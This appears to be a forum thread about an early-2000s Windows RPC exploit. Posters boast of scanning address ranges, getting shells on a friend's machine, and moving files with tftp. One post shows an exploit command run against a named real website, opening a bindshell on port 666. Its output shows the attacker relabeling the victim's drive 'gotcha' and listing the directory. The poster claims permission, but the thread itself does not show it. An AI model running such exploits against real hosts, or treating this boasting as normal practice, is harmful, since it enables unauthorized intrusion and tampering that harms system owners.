Originally posted here by prodikal


True indeed tedob1 but not all people are computer illiterate just out of curiosity i scanned my range with nmap and out of 254 boxes there were only about 20 firewalled i didnt try to get in to any the boxes but IMO i would say at least 150 of those people would have been vulnerable



Exactly that's who it will effevt the public. Maybe ISP's should start email all there user's telling them of this new bug in windows



The code i posted will drop you in to a shell with the right's of the person who is logged in i tested it on a friends machine and i had a shell in like 5 secs i could tftp to it up-load what ever i wanted i could download any file i wanted as-well but untill people realise about security there isnt much people can do

To be honest this code (need to be tweaked a bit first) really scary and works.. I've found 11 websites so far.. have vurnerability using this code and all of "ADM FROM THOSE WEBSITES HAVE BEEN NOTIFIED" before "THE BAD GUYS GET'S THEM".
So this is just one of example of one of those websites:
Code:
#./labexploits 4 www.kghyzt.com

-Target: [Win2k-]:www.kghyzt.com:135, Bindshell:666, RET=[0x0018759f]
 [+] Connected to bindshell.. 
 
 -- exploits penetration succesfully --
 
 Microsoft Windows 2000 [Version 5.00.2195]
 (C) Copyright 1985-2000 Microsoft Corp. 
 
 C:\WINNT\system32>label gocha
 label gotcha
 
 C:\WINNT\system32>cd\ 
 cd\ 

 C:\>dir
 dir
 Volume in drive C is gotcha
 Volume Serial Number is 30A1-E843 
 
 Directory of C:\ 
 
 03/27/2003 12:11p <DIR> Backup 
 09/19/2002 05:24p <DIR> Documents and Settings 
 09/19/2002 05:18p <DIR> Inetpub 
 09/25/2002 05:30p <DIR> MDaemon 
 10/31/2002 11:55p <DIR> Program Files 
 09/19/2002 07:50p 600 PUTTY.RND 
 10/10/2002 10:49p <DIR> WINNT 
 1 File(s) 600 bytes 
 6 Dir(s) 7,899,820,032 bytes free 
 
 C:\>

PS:Yes I do have permission to do penetration on those websites to prove it that code really works BUT now I have stopped to do testing again and I move on to do another thing ( my assign )